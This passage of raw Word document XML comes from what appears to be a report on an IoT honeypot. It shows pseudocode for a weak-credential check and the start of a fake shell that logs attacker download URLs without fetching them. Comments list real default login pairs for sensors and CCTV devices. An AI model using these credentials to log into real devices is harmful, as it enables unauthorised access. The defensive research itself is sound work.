              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">1:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> is_weak(device, user, pass):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">2:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> device </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> cache </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">3:          env ← WEAK_CREDS_&lt;DEVICE&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">4:          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> env is set </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">5:              cache[device] ← parse("u:p,u:p")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">6:          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">else</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">7:              cache[device] ← DEFAULTS[device]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">8:          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">end if</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">9:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">end if</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">10:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> (user, pass) ∈ cache[device]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">11: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">// DEFAULTS = common pairs ∪ device pairs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">12: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">//   e.g. sensor: root:vizxv, root:xc3511</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">13: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">//   cctv: admin:12345, root:xmhdipc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9020" w:name="_Toc69020"/>
      <w:r>
        <w:t xml:space="preserve">Algorithm A3 – High-Interaction Fake Shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9020"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="935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50"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w14:paraId="1C44353D" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A3 FakeShell.run (common/fakeshell.py, used by SSH and Telnet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="4728BCD6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Input:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> one command line typed by the attacker; current fake file system and device state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="5AB6A575" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Output:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> realistic BusyBox output; command, download_attempt, exec_attempt and state_change events</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="55E31788" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> run(line):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">for each</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> url </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> URL_REGEX.findall(line) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3:          log("download_attempt", url)            </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// stored as IOC — NEVER fetched</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">end for</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5:      out ← [];  last_ok ← true</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">for each</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (op, segment) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> split_chain(line) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// ;  &amp;&amp;  ||  &amp;  respecting quotes</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7:          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> op = "&amp;&amp;" </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> last_ok </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
